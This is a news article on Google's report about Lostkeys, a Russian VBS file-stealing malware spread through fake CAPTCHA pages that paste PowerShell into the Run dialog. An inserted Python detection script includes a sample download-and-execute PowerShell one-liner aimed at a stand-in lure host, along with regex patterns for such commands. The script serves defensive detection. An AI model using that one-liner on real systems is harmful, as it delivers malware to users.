Google Identifies Lostkeys, a Russian Malware That Can Steal Specific Files and Directories

As per Google, Lostkeys is a Visual Basic Script (VBS)-based data theft malware.

Written by Akash Dutta, Edited by Siddharth Suvarna | Updated: 12 May 2025 15:59 IST

Photo Credit: Reuters

Google has upgraded Chrome to protect users from websites that might be spreading this malware

Highlights
  • The malware is said to be linked to the Russian threat group Coldriver
  • Lostkeys malware was first observed in January
  • It is spread via a multi-step infection chain, starting with a lure site

Google Threat Intelligence Group (GTIG) shared a report about a new piece of malware last week. The new malware, dubbed Lostkeys, is described as data theft malware and is said to be linked with the Russian threat group Coldriver. Lostkeys is considered dangerous because it is delivered at the end of a multi-step chain that starts with a lure website. The malware can steal specific files from a hard-coded list of extensions and directories. It can also send system information and a list of running processes to the attacker.

New Malware Linked to Russian Threat Group Coldriver Identified

In a blog post, the Mountain View-based tech giant highlighted that the newly discovered malware was first observed in January, followed by multiple observations in March and April. It appears to be the new tool in the arsenal of the threat group Coldriver (also known as UNC4057, Star Blizzard, and Callisto).

Notably, Google highlights that Coldriver is known for running credential phishing against targets such as NATO governments, non-governmental organisations (NGOs), as well as militaries, journalists, and diplomatic officers. The group was associated with the Spica malware in 2024.

The modus operandi (MO) of the group is trickier than typical phishing attacks. First, fake emails impersonating legitimate institutions are sent to victims. These emails contain links to lure websites that display a fake CAPTCHA to convince the victim of their legitimacy. When the user confirms the CAPTCHA, a PowerShell command is copied to the user's clipboard.

Notably, PowerShell is a command-line shell and scripting language primarily used for system administration, automation, and configuration management in Windows environments. Because PowerShell is built into Windows and has deep system access, it's often abused by attackers to download and execute malware in memory.

Once the PowerShell command has been copied, the page prompts the user to execute it via the “Run” prompt. Doing so triggers the second stage, which calculates the MD5 hash of the device's display resolution. This is typically followed by a third stage intended to evade execution in virtual machines (if the second stage's MD5 check did not already detect one).

After this, a further stage retrieves and decodes the final payload, a Visual Basic Script (VBS) file, otherwise known as Lostkeys. GTIG highlights that it is capable of “stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker.”
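As an added illustration (not code from Google's report or from this article), the following Python script runs a simple detection over constructed Sysmon Event ID 1 (process creation) records and flags the two most visible steps of the chain described above: PowerShell launched from the Run prompt (parent explorer.exe) with download or decode switches on its command line, and PowerShell subsequently spawning a Windows script host to run a .vbs file. The log lines, hostnames and paths are constructed samples.

```python
import json
import re

# Constructed Sysmon Event ID 1 records as JSON lines (sample data, not real telemetry).
SAMPLE_LOGS = [
    r'{"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -c \"iex (iwr https://lure.example/stage2 -UseBasicParsing)\""}',
    r'{"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell Get-ChildItem C:\\Users"}',
    r'{"ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Image":"C:\\Windows\\System32\\wscript.exe","CommandLine":"wscript.exe C:\\Users\\alice\\AppData\\Local\\Temp\\update.vbs"}',
    r'{"ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -File C:\\scripts\\backup.ps1"}',
]

# Switches and cmdlets typical of a clipboard-pasted "download and run in memory" one-liner.
DOWNLOAD_OR_DECODE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-expression|\biex\b|downloadstring|"
    r"frombase64string|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)
SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename(win_path):
    """Last component of a Windows path, lower-cased (works on non-Windows hosts too)."""
    return win_path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return a short detection tag for one process-creation event, or None."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    # Stage 1: a user pasted a PowerShell one-liner into the Run dialog (parent explorer.exe).
    if image in SHELLS and parent == "explorer.exe" and DOWNLOAD_OR_DECODE.search(cmd):
        return "run-dialog-powershell-download"
    # Final stage: PowerShell hands off to a script host to execute the dropped VBS payload.
    if image in SCRIPT_HOSTS and parent in SHELLS and ".vbs" in cmd.lower():
        return "powershell-spawned-vbs"
    return None


def scan(lines):
    """Parse JSON log lines and return [(line_index, tag)] for every flagged event."""
    hits = []
    for i, line in enumerate(lines):
        tag = classify(json.loads(line))
        if tag:
            hits.append((i, tag))
    return hits


if __name__ == "__main__":
    for idx, tag in scan(SAMPLE_LOGS):
        print(f"line {idx}: {tag}")
```

Because explorer.exe is also the parent when a user double-clicks a shortcut, the first rule additionally requires a download or decode indicator on the command line; the benign records in the sample (an interactive directory listing and a scheduled script run from cmd.exe) are left alone.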

Google states that Coldriver typically uses malware to steal emails and contacts from targets; however, at times, it is also known to deploy malware such as Spica to access documents on the target system. Lostkeys also enables a similar goal.

Notably, the tech giant has added all the identified malicious websites, domains, and files to Safe Browsing in Google Chrome to protect users from exploitation. It is also sending government-backed attacker alerts to targeted Gmail and Workspace users. These alerts notify users about the threat and encourage them to enable Enhanced Safe Browsing.
